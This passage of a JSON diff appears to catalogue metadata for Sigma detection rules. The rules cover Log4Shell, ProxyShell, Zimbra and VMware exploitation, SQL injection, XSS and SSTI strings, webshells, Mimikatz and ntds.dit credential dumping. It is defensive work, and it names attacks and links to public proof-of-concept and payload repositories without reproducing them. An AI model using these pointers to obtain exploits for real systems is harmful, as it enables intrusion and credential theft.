"https://github.com/YfryTchsGD/Log4jAttackSurface", + "https://twitter.com/shutingrz/status/1469255861394866177?s=21", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_44228_log4j.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "5ea8faa8-db8b-45be-89b0-151b84c82702", + "value": "Log4j RCE CVE-2021-44228 Generic" + }, + { + "description": "Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 in different header fields found in web server logs (Log4Shell)", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/12/10", + "falsepositive": [ + "Vulnerability scanning" + ], + "filename": "web_cve_2021_44228_log4j_fields.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.lunasec.io/docs/blog/log4j-zero-day/", + "https://news.ycombinator.com/item?id=29504755", + "https://github.com/tangxiaofeng7/apache-log4j-poc", + "https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b", + "https://github.com/YfryTchsGD/Log4jAttackSurface", + "https://twitter.com/shutingrz/status/1469255861394866177?s=21", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_44228_log4j_fields.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "9be472ed-893c-4ec0-94da-312d2765f654", + "value": "Log4j RCE CVE-2021-44228 in Fields" + }, + { + "description": "Detects an attempt to leverage the vulnerable servlet \"mboximport\" for an unauthenticated remote command injection", + "meta": { + "author": "@gott_cyber", + "creation_date": "2022/08/17", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2022_27925_exploit.yml", + "level": "medium", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/", + 
"https://www.yang99.top/index.php/archives/82/", + "https://github.com/vnhacker1337/CVE-2022-27925-PoC", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_27925_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "cve.2022.27925" + ] + }, + "uuid": "dd218fb6-4d02-42dc-85f0-a0a376072efd", + "value": "Zimbra Collaboration Suite Email Server Unauthenticated RCE" + }, + { + "description": "Detects the exploitation of VMware Workspace ONE Access Authentication Bypass vulnerability as described in CVE-2022-31656\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users.\nA malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/12", + "falsepositive": [ + "Vulnerability scanners" + ], + "filename": "web_cve_2022_31656_auth_bypass.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_31656_auth_bypass.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "fcf1101d-07c9-49b2-ad81-7e421ff96d80", + "value": "CVE-2022-31656 VMware Workspace ONE Access Auth Bypass" + }, + { + "description": "Detects possible exploitation of VMware Workspace ONE Access Admin Remote Code Execution vulnerability as described in CVE-2022-31659", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/12", + "falsepositive": [ + "Vulnerability scanners", + "Legitimate access to the URI" + ], + "filename": "web_cve_2022_31659_vmware_rce.yml", + "level": "medium", + "logsource.category": "webserver", + 
"logsource.product": "No established product", + "refs": [ + "https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_31659_vmware_rce.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "efdb2003-a922-48aa-8f37-8b80021a9706", + "value": "CVE-2022-31659 VMware Workspace ONE Access RCE" + }, + { + "description": "Detects attempts to exploit an apache spark server via CVE-2014-6287 from a weblogs perspective", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/19", + "falsepositive": [ + "Web vulnerability scanners" + ], + "filename": "web_cve_2022_33891_spark_shell_command_injection.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py", + "https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html", + "https://github.com/apache/spark/pull/36315/files", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_33891_spark_shell_command_injection.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "cve.2022.33891" + ] + }, + "uuid": "1a9a04fd-02d1-465c-abad-d733fd409f9c", + "value": "Apache Spark Shell Command Injection - Weblogs" + }, + { + "description": "Detects attempts to exploit the Atlassian Bitbucket Command Injection CVE-2022-36804", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/29", + "falsepositive": [ + "Web vulnerability scanners" + ], + "filename": "web_cve_2022_36804_atlassian_bitbucket_command_injection.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://twitter.com/_0xf4n9x_/status/1572052954538192901", + 
"https://www.rapid7.com/blog/post/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/", + "https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html", + "https://blog.assetnote.io/2022/09/14/rce-in-bitbucket-server/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_36804_atlassian_bitbucket_command_injection.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "cve.2022.36804" + ] + }, + "uuid": "65c0a0ab-d675-4441-bd6b-d3db226a2685", + "value": "Atlassian Bitbucket Command Injection Via Archive API" + }, + { + "description": "Detects exploitation attempts in Exchange server logs as described in blog posts reporting on HAFNIUM group activity", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/03/03", + "falsepositive": [ + "Legitimate access to other web applications that use the same folder names as Exchange (e.g. owa, ecp) but are not Microsoft Exchange related" + ], + "filename": "web_exchange_exploitation_hafnium.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", + "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_exchange_exploitation_hafnium.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "67bce556-312f-4c81-9162-c3c9ff2599b2", + "value": "Exchange Exploitation Used by HAFNIUM" + }, + { + "description": "Detects URL patterns that could be found in ProxyShell exploitation attempts against Exchange servers (failed and successful)", + "meta": { + "author": "Florian Roth, Rich Warren", + "creation_date": "2021/08/07", + "falsepositive": [ + "Unknown" + ], + "filename": 
"web_exchange_proxyshell.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://youtu.be/5mqid-7zp8k?t=2231", + "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", + "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_exchange_proxyshell.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "23eee45e-933b-49f9-ae1b-df706d2d52ef", + "value": "Exchange ProxyShell Pattern" + }, + { + "description": "Detects URP patterns and status codes that indicate a successful ProxyShell exploitation attack against Exchange servers", + "meta": { + "author": "Florian Roth, Rich Warren", + "creation_date": "2021/08/09", + "falsepositive": [ + "Unknown" + ], + "filename": "web_exchange_proxyshell_successful.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://youtu.be/5mqid-7zp8k?t=2231", + "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", + "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_exchange_proxyshell_successful.yml" + ], + "tags": [ + "attack.initial_access" + ] + }, + "uuid": "992be1eb-e5da-437e-9a54-6d13b57bb4d8", + "value": "Successful Exchange ProxyShell Attack" + }, + { + "description": "When IIS uses an old .Net Framework it's possible to enumerate folders with the symbol \"~\"", + "meta": { + "author": "frack113", + "creation_date": "2021/10/06", + "falsepositive": [ + "Unknown" + ], + "filename": "web_iis_tilt_shortname_scan.yml", + "level": "medium", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + 
"https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/fuzzing/iis-shortname.yaml", + "https://www.exploit-db.com/exploits/19525", + "https://github.com/lijiejie/IIS_shortname_Scanner", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_iis_tilt_shortname_scan.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "7cb02516-6d95-4ffc-8eee-162075e111ac", + "value": "Successful IIS Shortname Fuzzing Scan" + }, + { + "description": "Detects possible Java payloads in web access logs", + "meta": { + "author": "frack113", + "creation_date": "2022/06/04", + "falsepositive": [ + "Legitimate apps" + ], + "filename": "web_java_payload_in_access_logs.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/", + "https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/", + "https://github.com/httpvoid/writeups/blob/62d3751945289d088ccfdf4d0ffbf61598a2cd7d/Confluence-RCE.md", + "https://twitter.com/httpvoid0x2f/status/1532924261035384832", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_java_payload_in_access_logs.yml" + ], + "tags": [ + "cve.2022.26134", + "cve.2021.26084" + ] + }, + "uuid": "583aa0a2-30b1-4d62-8bf3-ab73689efe6c", + "value": "Java Payload Strings" + }, + { + "description": "Detects exploitation attempt using the JDNIExploiit Kit", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/12/12", + "falsepositive": [ + "Legitimate apps the use these paths" + ], + "filename": "web_jndi_exploit.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://github.com/pimps/JNDI-Exploit-Kit", + "https://githubmemory.com/repo/FunctFan/JNDIExploit", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_jndi_exploit.yml" + ], + "tags": "No established tags" + }, + "uuid": "412d55bc-7737-4d25-9542-5b396867ce55", + "value": "JNDIExploit Pattern" + }, + { + "description": "Detects possible exploitation activity or bugs in a web application", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2017/02/19", + "falsepositive": [ + "Unstable application", + "Application that misuses the response codes" + ], + "filename": "web_multiple_susp_resp_codes_single_source.yml", + "level": "medium", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_multiple_susp_resp_codes_single_source.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "6fdfc796-06b3-46e8-af08-58f3505318af", + "value": "Multiple Suspicious Resp Codes Caused by Single Client" + }, + { + "description": "Detects a core dump of a crashing Nginx worker process, which could be a signal of a serious problem or exploitation attempts.", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/05/31", + "falsepositive": [ + "Serious issues with a configuration or plugin" + ], + "filename": "web_nginx_core_dump.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "No established product", + "refs": [ + "https://docs.nginx.com/nginx/admin-guide/monitoring/debugging/#enabling-core-dumps", + "https://www.x41-dsec.de/lab/advisories/x41-2021-002-nginx-resolver-copy/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_nginx_core_dump.yml" + ], + "tags": [ + "attack.impact", + "attack.t1499.004" + ] + }, + "uuid": "59ec40bb-322e-40ab-808d-84fa690d7e56", + "value": "Nginx Core Dump" + }, + { + "description": "Detects path traversal exploitation attempts", + "meta": { + "author": "Subhash Popuri (@pbssubhash), Florian Roth (generalisation)", + 
"creation_date": "2021/09/25", + "falsepositive": [ + "Happens all the time on systems exposed to the Internet", + "Internal vulnerability scanners" + ], + "filename": "web_path_traversal_exploitation_attempt.yml", + "level": "medium", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://github.com/projectdiscovery/nuclei-templates", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_path_traversal_exploitation_attempt.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "7745c2ea-24a5-4290-b680-04359cb84b35", + "value": "Path Traversal Exploitation Attempts" + }, + { + "description": "Detects access to SUPERNOVA webshell as described in Guidepoint report", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/12/17", + "falsepositive": [ + "Unknown" + ], + "filename": "web_solarwinds_supernova_webshell.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/", + "https://www.anquanke.com/post/id/226029", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_solarwinds_supernova_webshell.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ] + }, + "uuid": "a2cee20b-eacc-459f-861d-c02e5d12f1db", + "value": "Solarwinds SUPERNOVA Webshell Access" + }, + { + "description": "Detects exploitation attempts of the SonicWall Jarrewrite Exploit", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/01/25", + "falsepositive": [ + "Unknown" + ], + "filename": "web_sonicwall_jarrewrite_exploit.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_sonicwall_jarrewrite_exploit.yml" 
+ ], + "tags": [ + "attack.t1190", + "attack.initial_access" + ] + }, + "uuid": "6f55f047-112b-4101-ad32-43913f52db46", + "value": "SonicWall SSL/VPN Jarrewrite Exploit" + }, + { + "description": "Detects source code enumeration that use GET requests by keyword searches in URL strings", + "meta": { + "author": "James Ahearn", + "creation_date": "2019/06/08", + "falsepositive": [ + "Unknown" + ], + "filename": "web_source_code_enumeration.yml", + "level": "medium", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://pentester.land/tutorials/2018/10/25/source-code-disclosure-via-exposed-git-folder.html", + "https://medium.com/@logicbomb_1/bugbounty-how-i-was-able-to-download-the-source-code-of-indias-largest-telecom-service-52cf5c5640a1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_source_code_enumeration.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1083" + ] + }, + "uuid": "953d460b-f810-420a-97a2-cfca4c98e602", + "value": "Source Code Enumeration Detection by Keyword" + }, + { + "description": "Detects SQL Injection attempts via GET requests in access logs", + "meta": { + "author": "Saw Win Naung, Nasreddine Bencherchali", + "creation_date": "2020/02/22", + "falsepositive": [ + "Java scripts and CSS Files", + "User searches in search boxes of the respective website", + "Internal vulnerability scanners can cause some serious FPs when used, if you experience a lot of FPs due to this think of adding more filters such as \"User Agent\" strings and more response codes" + ], + "filename": "web_sql_injection_in_access_logs.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.acunetix.com/blog/articles/exploiting-sql-injection-example/", + "https://www.acunetix.com/blog/articles/using-logs-to-investigate-a-web-application-attack/", + "https://brightsec.com/blog/sql-injection-payloads/", + 
"https://github.com/payloadbox/sql-injection-payload-list", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_sql_injection_in_access_logs.yml" + ], + "tags": "No established tags" + }, + "uuid": "5513deaf-f49a-46c2-a6c8-3f111b5cb453", + "value": "SQL Injection Strings" + }, + { + "description": "Detects SSTI attempts sent via GET requests in access logs", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/14", + "falsepositive": [ + "User searches in search boxes of the respective website", + "Internal vulnerability scanners can cause some serious FPs when used, if you experience a lot of FPs due to this think of adding more filters such as \"User Agent\" strings and more response codes" + ], + "filename": "web_ssti_in_access_logs.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection", + "https://github.com/payloadbox/ssti-payloads", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_ssti_in_access_logs.yml" + ], + "tags": "No established tags" + }, + "uuid": "ada3bc4f-f0fd-42b9-ba91-e105e8af7342", + "value": "Server Side Template Injection Strings" + }, + { + "description": "Detects known suspicious (default) user-agents related to scanning/recon tools", + "meta": { + "author": "Nasreddine Bencherchali, Tim Shelton", + "creation_date": "2022/07/19", + "falsepositive": [ + "Unknown" + ], + "filename": "web_susp_useragents.yml", + "level": "medium", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://github.com/wpscanteam/wpscan/blob/196fbab5b1ce3870a43515153d4f07878a89d410/lib/wpscan/browser.rb", + "https://github.com/xmendez/wfuzz/blob/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/docs/user/basicusage.rst", + 
"https://github.com/lanmaster53/recon-ng/blob/9e907dfe09fce2997f0301d746796408e01a60b7/recon/core/base.py#L92", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_susp_useragents.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "19aa4f58-94ca-45ff-bc34-92e533c0994a", + "value": "Suspicious User-Agents Related To Recon Tools" + }, + { + "description": "Detects suspicious windows strins in URI which could indicate possible exfiltration or webshell communication", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/06", + "falsepositive": [ + "Legitimate application and websites that use windows paths in their URL" + ], + "filename": "web_susp_windows_path_uri.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_susp_windows_path_uri.yml" + ], + "tags": [ + "attack.persistence", + "attack.exfiltration", + "attack.t1505.003" + ] + }, + "uuid": "9f6a34b4-2688-4eb7-a7f5-e39fef573d0e", + "value": "Suspicious Windows Strings In URI" + }, + { + "description": "Detects access to DEWMODE webshell as described in FIREEYE report", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/02/22", + "falsepositive": [ + "Unknown" + ], + "filename": "web_unc2546_dewmode_php_webshell.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_unc2546_dewmode_php_webshell.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ] + }, + "uuid": "fdf96c90-42d5-4406-8a9c-14a2c9a016b5", + "value": "DEWMODE Webshell 
Access" + }, + { + "description": "Certain strings in the uri_query field when combined with null referer and null user agent can indicate activity associated with the webshell ReGeorg.", + "meta": { + "author": "Cian Heasley", + "creation_date": "2020/08/04", + "falsepositive": [ + "Web applications that use the same URL parameters as ReGeorg" + ], + "filename": "web_webshell_regeorg.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://community.rsa.com/community/products/netwitness/blog/2019/02/19/web-shells-and-netwitness-part-3", + "https://github.com/sensepost/reGeorg", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_webshell_regeorg.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ] + }, + "uuid": "2ea44a60-cfda-11ea-87d0-0242ac130003", + "value": "Webshell ReGeorg Detection Via Web Logs" + }, + { + "description": "Detects Windows Webshells that use GET requests via access logs", + "meta": { + "author": "Florian Roth, Nasreddine Bencherchali", + "creation_date": "2017/02/19", + "falsepositive": [ + "Web sites like wikis with articles on os commands and pages that include the os commands in the URLs", + "User searches in search boxes of the respective website" + ], + "filename": "web_win_webshells_in_access_logs.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://bad-jubies.github.io/RCE-NOW-WHAT/", + "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_win_webshells_in_access_logs.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ] + }, + "uuid": "7ff9db12-1b94-4a79-ba68-a2402c5d6729", + "value": "Windows Webshell Strings" + }, + { + "description": "Detects XSS attempts injected via GET requests in access logs", + "meta": { + "author": "Saw Win Naung, 
Nasreddine Bencherchali", + "creation_date": "2021/08/15", + "falsepositive": [ + "JavaScripts,CSS Files and PNG files", + "User searches in search boxes of the respective website", + "Internal vulnerability scanners can cause some serious FPs when used, if you experience a lot of FPs due to this think of adding more filters such as \"User Agent\" strings and more response codes" + ], + "filename": "web_xss_in_access_logs.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://github.com/payloadbox/xss-payload-list", + "https://portswigger.net/web-security/cross-site-scripting/contexts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_xss_in_access_logs.yml" + ], + "tags": "No established tags" + }, + "uuid": "65354b83-a2ea-4ea6-8414-3ab38be0d409", + "value": "Cross Site Scripting Strings" + }, + { + "description": "This method detects mimikatz keywords in different Eventlogs (some of them only appear in older Mimikatz version that are however still used by different threat groups)", + "meta": { + "author": "Florian Roth (rule), David ANDRE (additional keywords)", + "creation_date": "2017/01/10", + "falsepositive": [ + "Naughty administrators", + "AV Signature updates", + "Files with Mimikatz in their filename" + ], + "filename": "win_alert_mimikatz_keywords.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://tools.thehacker.recipes/mimikatz/modules", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/win_alert_mimikatz_keywords.yml" + ], + "tags": [ + "attack.s0002", + "attack.lateral_movement", + "attack.credential_access", + "car.2013-07-001", + "car.2019-04-004", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.001", + "attack.t1003.006" + ] + }, + "uuid": "06d71506-7beb-4f22-8888-e2e5e2ca7fd8", + "value": "Mimikatz Use" + }, + { + "description": "Detects events 
generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited.\nMS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability.\nUnfortunately, that is about the only instance of CVEs being written to this log.\n", + "meta": { + "author": "Florian Roth, Zach Mathis", + "creation_date": "2020/01/15", + "falsepositive": [ + "Unknown" + ], + "filename": "win_audit_cve.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/VM_vivisector/status/1217190929330655232", + "https://twitter.com/DidierStevens/status/1217533958096924676", + "https://twitter.com/FlemmingRiis/status/1217147415482060800", + "https://www.youtube.com/watch?v=ebmW42YYveI", + "https://nullsec.us/windows-event-log-audit-cve/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_audit_cve.yml" + ], + "tags": [ + "attack.execution", + "attack.t1203", + "attack.privilege_escalation", + "attack.t1068", + "attack.defense_evasion", + "attack.t1211", + "attack.credential_access", + "attack.t1212", + "attack.lateral_movement", + "attack.t1210", + "attack.impact", + "attack.t1499.004" + ] + }, + "uuid": "48d91a3a-2363-43ba-a456-ca71ac3da5c2", + "value": "Audit CVE Event" + }, + { + "description": "This detection method points out highly relevant Antivirus events", + "meta": { + "author": "Florian Roth, Arnim Rupp", + "creation_date": "2017/02/19", + "falsepositive": [ + "Some software piracy tools (key generators, cracks) are classified as hack tools" + ], + "filename": "win_av_relevant_match.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.virustotal.com/gui/file/13828b390d5f58b002e808c2c4f02fdd920e236cc8015480fa33b6c1a9300e31", + 
"https://www.virustotal.com/gui/file/15b57c1b68cd6ce3c161042e0f3be9f32d78151fe95461eedc59a79fc222c7ed", + "https://www.virustotal.com/gui/file/5092b2672b4cb87a8dd1c2e6047b487b95995ad8ed5e9fc217f46b8bfb1b8c01", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_av_relevant_match.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1588" + ] + }, + "uuid": "78bc5783-81d9-4d73-ac97-59f6db4f72a8", + "value": "Relevant Anti-Virus Event" + }, + { + "description": "An application has been removed. Check if it is critical.", + "meta": { + "author": "frack113", + "creation_date": "2022/01/28", + "falsepositive": [ + "Unknown" + ], + "filename": "win_builtin_remove_application.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_builtin_remove_application.yml" + ], + "tags": [ + "attack.impact", + "attack.t1489" + ] + }, + "uuid": "570ae5ec-33dc-427c-b815-db86228ad43e", + "value": "Application Uninstalled" + }, + { + "description": "Detects potential abuse of ntdsutil to dump ntds.dit database", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/14", + "falsepositive": [ + "Legitimate backup operation/creating shadow copies" + ], + "filename": "win_esent_ntdsutil_abuse.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mgreen27/status/1558223256704122882", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_esent_ntdsutil_abuse.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "e6e88853-5f20-4c4a-8d26-cd469fd8d31f", + "value": "Ntdsutil Abuse" + }, + { + "description": "Detects potential 
abuse of ntdsutil to dump ntds.dit database to a suspicious location", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/14", + "falsepositive": [ + "Legitimate backup operation/creating shadow copies" + ], + "filename": "win_esent_ntdsutil_abuse_susp_location.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mgreen27/status/1558223256704122882", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_esent_ntdsutil_abuse_susp_location.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "94dc4390-6b7c-4784-8ffc-335334404650", + "value": "Dump Ntds.dit To Suspicious Location" + }, + { + "description": "Detects MSI package installation from suspicious locations", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/31", + "falsepositive": [ + "Some false positives may occur depending on the environnement" + ], + "filename": "win_msi_install_from_susp_locations.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_msi_install_from_susp_locations.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "c7c8aa1c-5aff-408e-828b-998e3620b341", + "value": "MSI Installation From Suspicious Locations" + }, + { + "description": "Detects installation of a remote msi file from web.", + "meta": { + "author": "Stamatis Chatzimangou", + "creation_date": "2022/10/23", + "falsepositive": [ + "Unknown" + ], + "filename": "win_msi_install_from_web.yml", + "level": "medium", + 
"logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/_st0pp3r_/status/1583922009842802689", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_msi_install_from_web.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218", + "attack.t1218.007" + ] + }, + "uuid": "5594e67a-7f92-4a04-b65d-1a42fd824a60", + "value": "MSI Installation From Web" + }, + { + "description": "Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/13", + "falsepositive": [ + "Rare legitimate administrative activity" + ], + "filename": "win_mssql_add_sysadmin_account.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_add_sysadmin_account.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "08200f85-2678-463e-9c32-88dce2f073d1", + "value": "MSSQL Add Account To Sysadmin Role" + }, + { + "description": "Detects when an attacker calls the \"ALTER SERVER AUDIT\" or \"DROP SERVER AUDIT\" transaction in order to delete or disable audit logs on the server", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/13", + "falsepositive": [ + "This event should only fire when an administrator is modifying the audit policy. 
